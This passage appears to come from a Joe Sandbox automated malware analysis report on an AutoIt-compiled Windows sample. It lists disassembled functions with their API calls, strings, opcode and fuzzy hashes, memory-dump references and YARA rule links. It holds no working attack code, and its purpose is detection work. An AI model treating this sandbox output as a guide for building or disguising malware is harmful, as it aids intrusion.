                                                                                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                    Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                    Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _strlen.LIBCMT ref: 0040F858
                                                                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_sprintf_strlen
                                                                                                                    • String ID: %02X
                                                                                                                    • API String ID: 1921645428-436463671
                                                                                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                    Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                    Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                    Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                    Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: htonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 3832099526-2422070025
                                                                                                                    • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                    • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                    Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InternetOpen
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 2038078732-4266983199
                                                                                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                    Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                    • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                    Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: u,D
                                                                                                                    • API String ID: 4104443479-3858472334
                                                                                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                    Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • wsprintfW.USER32 ref: 0045612A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend_mallocwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 1262938277-328681919
                                                                                                                    • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                    • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                    Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                    • InternetCloseHandle.WININET ref: 00442668
                                                                                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                    • String ID: aeB
                                                                                                                    • API String ID: 857135153-906807131
                                                                                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                    Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                    Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                    Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
